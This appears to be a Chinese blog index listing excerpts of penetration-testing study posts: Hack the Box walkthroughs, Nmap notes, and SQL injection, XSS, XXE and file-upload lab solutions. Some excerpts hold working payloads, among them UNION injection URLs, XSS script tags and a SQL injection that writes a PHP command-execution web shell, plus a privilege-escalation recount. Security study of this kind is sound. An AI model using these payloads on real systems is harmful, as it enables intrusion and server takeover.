- 博客(34)
- 收藏
- 关注
RSS订阅原创 Turbo Intruder:突破速率限制
Turbo Intruder 是一个 Burp Suite 扩展插件,用于发送大量 HTTP 请求并分析结果。它旨在处理那些需要异常速度、持续时间或复杂性的攻击来补充Burp Intruder。快速- Turbo Intruder 使用了一个重写的 HTTP 栈 ,用于提升速度。因此,在许多目标上,它甚至可以大大超过流行的异步Go脚本。可扩展-Turbo Intruder 可以实现平坦的内存使用,实现可靠的连续多天运行。同时可以脱离 burp suite 使用。灵活- 使用 Python 配置攻击。
2023-03-16 14:19:14
5297
2
原创 渗透测试学习日记之Hack the Box - Crocodile
使用kali自带的字典(/usr/share/wordlists)对目标进行目录扫描。使用anonymous登录ftp服务器,将服务器中的文件下载到本地。结合FTP服务器上的文件,尝试使用用户名和密码登录进行登录。查看提示,结合nmap扫描时发现的文件可能包含用户名列表。结合扫描结果与提示,最终确认结果为login.php。查看gobuster帮助文档。
2022-12-12 16:27:53
468
原创 渗透测试学习日记之Hack the Box - Redeemer
老规矩第一步启动机器计算机上哪个TCP端口处于开放状态?6379提示为4位,最后一位是9。本来想四位数端口全扫(nmap -sV -sC -v -p 1000-9999 10.129.136.187)。网络问题太慢了。最后只能指定端口扫描。 计算机上打开的端口上正在运行那个服务?redis Redis是什么类型的数据库?从以下选项中选择:(i)In-memory Database(ii)Traditional DatabaseIn-memory Database 那个命令行实用程序用于Redis服务器交互?
2022-06-17 11:06:37
854
原创 渗透测试学习日记之Hack the Box - Dancing
首先创建机器三个字母的缩写词SMB代表什么?server message blockSMB使用哪个端口进行操作?445 从架构上讲,SMB是用什么样的网络通信模型?client-server model nmap扫描中出现的端口445的服务名称是什么microsoft-ds 我们使用什么工具从linux发行版连接到SMB共享?smbclient 我们可以使用SMB工具“列出”共享内容的"flag"或"switch"是什么? -L 我们最终能够访问的共享的名称是什么?WorkShares 我们可以在SMB
2022-06-13 16:36:53
314
原创 渗透测试学习日记之Hack the Box - Fawn
首先创建机器三个字母的首字母缩写FTP代表什么?file transfer protocol从架构上讲,FTP使用什么通信模型? client-server model一个流行的GUI FTP程序的名称是什么?filezillaFTP服务通常在哪个端口上活动?21 tcp FTP安全版本的首字母缩略词是什么?sftp 我们可以使用什么命令来测试与目标的连接?ping 通过扫描,目标上运行的FTP版本是什么? vsftpd 3.0.3 通过扫描,目标上运行的是什么操作系统类型?unix 通过匿名(anonym
2022-06-06 09:44:06
307
原创 Nmap帮助手册
nmap [扫描类型][选项]{目标规范}目标规范:可以传递主机名、IP地址、网络地址等。例如:scanme.nmap.org,microsoft.com/24,192.168.0.1; 10.0.0-255.1-254-iL : 从主机/网络列表输入-iR : 选择随机目标--exclude : 排除主机/网络--excludefile : 从文件中排除列表-sL:列表扫描 ...
2022-06-06 09:36:53
407
原创 XXE漏洞总结
搬运:未知攻焉知防——XXE漏洞攻防 - 博客 - 腾讯安全应急响应中心一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的元语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。DTD(文档类型定义)的作用是定义XML文档的合法构建模块。DTD可以再XML文档内部声明,也可以外部引用。内部声明DTD<根元素[声明元素]>引用外部DTD<根元素 SY
2022-05-27 17:17:50
1026
原创 Burp Macros功能实现token验证爆破
服务端有token验证,token不正确则会提示:“csrf token error”所以没办法重放,或者爆破。服务端返回内容中有携带token值,下次请求携带token值就可以正常访问。接下来使用burp macros功能动态获取token,然后绕过csrf的限制创建宏规则点击macros下的add找到token页面的请求记录,点击ok可以自定义描述,然后选择Configure item点击add点击refetch response再...
2022-04-15 18:01:15
1334
原创 xss漏洞知识总结
漏洞原理跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。未对用户的输入进行处理,浏览器将用户输入的内容当作脚本执行。恶意攻击者往Web页面里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而达到恶意的特殊目的。是一种针对用户浏览器的攻击。漏洞分类Xss主要分为三种类型:(1)反射型反射型xss又称非持久性xss,需要用户点击带有
2022-04-14 16:34:14
5798
1
原创 SQL注入之数据库判断
01 网站类型与数据库的联系asp:SQLServer,Access.net :SQLServerphp:Mysql,PostgreSqljava:Oracle,Mysql可以根据网站类型来大概确定后续测试数据库的优先级。02 依据主机端口如果可以对主机进行端口扫描,可以根据是否开启对应端口,来大概判断数据库类型。Oracle默认端口号:1521SQL Server默认端口号:1433MySQL默认端口号:3306PostgreSql默认端口号:54..
2022-04-14 11:40:33
4209
原创 haozi/xss-demo通关
目录0x000x010x020x030x040x050x060x070x080x090x0a0x0b0x0c0x0d0x0e0x0f0x100x110x120x00<script> alert(1)</script>0x01</textarea><script>alert(1)</script>0x02"><s...
2022-04-13 11:42:36
293
原创 封神台第五章提权
首先拿到webshell,终端拒绝访问。重新上传cmd.exe文件至服务器。右击-虚拟终端新建一个用户试试还是拒绝访问因为使用cmd需要用到外部接口wscript.shell。但是wscript.shell仍然在C盘,C盘我们仍然无法访问。这可怎么办?那么就只能再上传一个已经组装好的wscript.shell上传完成切换到此路径通过iis6.exe执行命令接着创建新用户命令执行成功,查看新建用户用户为users组成员,将其添加至管理员...
2022-03-31 14:58:58
4511
原创 SQL注入知识总结
目录漏洞原理漏洞危害利用方式手工注入手工注入步骤-基于联合查询:1、判断注入类型2、查询字段数3、判断回显位4、查询数据库的基本信息5、查询数据库中的数据报错注入xpath语法错误无回显无报错1,布尔盲注2,时间盲注3,带外注入4,SQL注入命令执行一4,SQL注入命令执行二堆叠注入HTTP头注入宽字节注入二次注入自动化注入SQLMAPsqlmap特性输出的内容设定目标综...
2022-03-30 11:00:03
10585
2
原创 sqli-labs做题记录(全65)
1,字符型http://192.168.2.6/sqli-labs/Less-1/?id=-1' union select 1,2,3; --+2,数值型http://192.168.2.6/sqli-labs/Less-2/?id=-1 union select 1,2,3; --+3,id值加了括号,需要闭合掉http://192.168.2.6/sqli-labs/Less-3/?id=-1')union select 1,2,3 ; --+4,由双引号闭合,且有括号htt
2022-03-18 17:49:04
5344
原创 Upload-labs做题记录(全20)
目录1,前端验证2,MIME类型检测3,黑名单检测4,黑名单检测5,黑名单检测6,黑名单检测7,黑名单检测8,黑名单检测9,黑名单检测10,黑名单检测11,白名单检查12,白名单检查13,文件头检测14,getimagesize()检查是否为图片文件15,exif_imagetype()检查是否为图片文件16,二次渲染17,上传后检测文件后缀名,若符合则对文件进行重命名,不符合则删除文件。18,19,不对文件进行检测,只对保存路
2022-03-14 16:42:19
3138
原创 Base64编码解码小脚本
import base64import os'''定义控制要处理的文件file_path="C:\\Users\\ma\\Desktop\\py\\" #文件存放路径raw_file_name="1.png" #文件名Processed_file_name="1.txt" #处理后文件名''''''对文件进行base64编码'''def encode_file(FILE): with ope.
2022-03-08 10:59:49
2611
原创 文件上传漏洞
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。文件上传漏洞一般都是指“上传Web脚本能够被服务器解析”的问题。
2022-02-28 15:29:48
18416
3
原创 SQL盲注脚本
#coding:utf-8import requestsimport timeip_port="127.0.0.1:80"data={ "login":"bee", "password":"bug", "security_level":"0", "form":"submit"}urlLogin="http://%s/login.php"%ip_portsession=requests.session()resp=session.post(urlLogin,.
2021-12-14 16:30:50
895
原创 NMAP的高级使用技巧和漏洞扫描发现
NMAP的高级使用技巧NMAP概述nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行及提供什么服务等信息。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。还可以探测操作系统类型。nmap可用于:1.检测活在网络上的主机(主机发现)2.检测主机上开放的端口(端口
2021-11-22 09:55:54
2731
原创 WireShark
WireShark简介和抓包原理及过程WireShark简介: WireShark是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。WireShark使用WinPCAP作为接口,直接与网卡进行数据报文交换。WireShark的应用: 网络管理员使用WireShark来监测网络问题,网络安全工程师使用WireShark来检查资讯安全相关问题,开发者使用WireShark来为新的通讯协议除错,普通使用者使用WireSh...
2021-11-19 13:45:34
894
原创 主动信息收集
主动信息收集的原理主动信息收集的特点1.直接与目标系统交互通信 2.无法避免留下访问的痕迹 3.使用受控的第三方电脑进行探测,使用代理或已经被控制的机器,做好被封杀的准备 4.扫描发送不同的探测,根据返回结果判断目标状态发现目标主机的过程 1.识别存活主机,发现潜在的被攻击目标 2.输出一个IP地址列表比如IP地址段IP地址范围 3.使用二、三、四曾进行探测发现OSI七...
2021-11-17 21:33:30
563
原创 被动信息收集
被动信息收集概述和目的 信息收集的方式分为两种:被动和主动。 被动信息收集方式是指利用第三方的服务对目标进行了解,如:Google搜索。 主动的信息收集方式:通过直接访问、扫描网站,这种将流量流经网站的行为。比如:nmap扫描端口。 被动信息收集的目的:通过公开渠道,去获得目标主机的信息,从而不与目标系统直接交互,避免留下痕迹。信息收集内容 1.IP地址段 2.域名信息 3.邮箱...
2021-11-15 20:02:39
5198
原创 kali基本配置
配置APT命令安装包的源为国内源vim /etc/apt/sources.list中科大kali源: deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib使用apt新的软件包源获取最新的软件包列表。注:apt...
2021-11-13 12:25:52
973
原创 学习日记7
SQL injectionid=1 union all select 1,2,load_file('c:/windows/system32/drivers/etc/hosts')into OUTFILEc:/xampp/htdocsid=1 union all select 1,2,"<php? echo'<pre>'.shell_exec($_GET['cmd']).'</pre>';?>" into OUTFILE '...
2021-11-09 16:03:32
497
原创 学习日记6
Vulnerability Scanning overview and considerationHow Vuln Scanners work Workflow of Vuln scanning1.Detect2.Port scan 3.Identify the OS 4.Identify running services 5.Signature-matching to dicscover v...
2021-11-09 08:31:11
84
原创 学习日记5
DNSEnumerationinteracting with a DNS serverhost -t mx megacorpone.com Automating lookupsForward lookup brute forcelist.txt: ftp mail owa proxy router批处理:for ip in $(cat [list.txt]...
2021-11-08 11:21:17
892
原创 学习日记4
passive information gatheringopen source intelligenceWebsite reconWhois whois 能查询到的信息google hackingintitle:"index of" "parent directory" 参考:信息收集之Google Hacking的简单用法_谢公子的博客-优快云博客_google hackingNetcarft...
2021-11-02 15:42:45
90
原创 学习日记3
Bash ScriptingIntro to Bash scripting.sh写.sh文件(hello-world.sh) #!/bin/bash # Hello World Bash Script echo "Hello World"执行 chmod +x hello-world.sh ./hello-world.shVariablessubshell...
2021-11-01 17:17:23
96
原创 学习日记2
practical toolsNetcatConnection to a TCP/UDP nc -n -v [target] [port]Listening to a TCP/UDP nc -nvlp [prot]Transferring file whith Netcat nc -l -p [prot] > [filename] nc [targrt] [port] < [filenam...
2021-11-01 13:10:14
139
原创 OSCP学习日记
1.Intro of OSCP and Kali2.Getting comfortable with Kali linux2.1Booting up Kali linuxdefaule pw for root:toorpasswdwhoami2.2The Kali menu2.3Kali documentationKali Docs | Kali Linux DocumentationKali Tools | Kali Linux ToolsKali Li
2021-10-25 16:27:47
2330
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人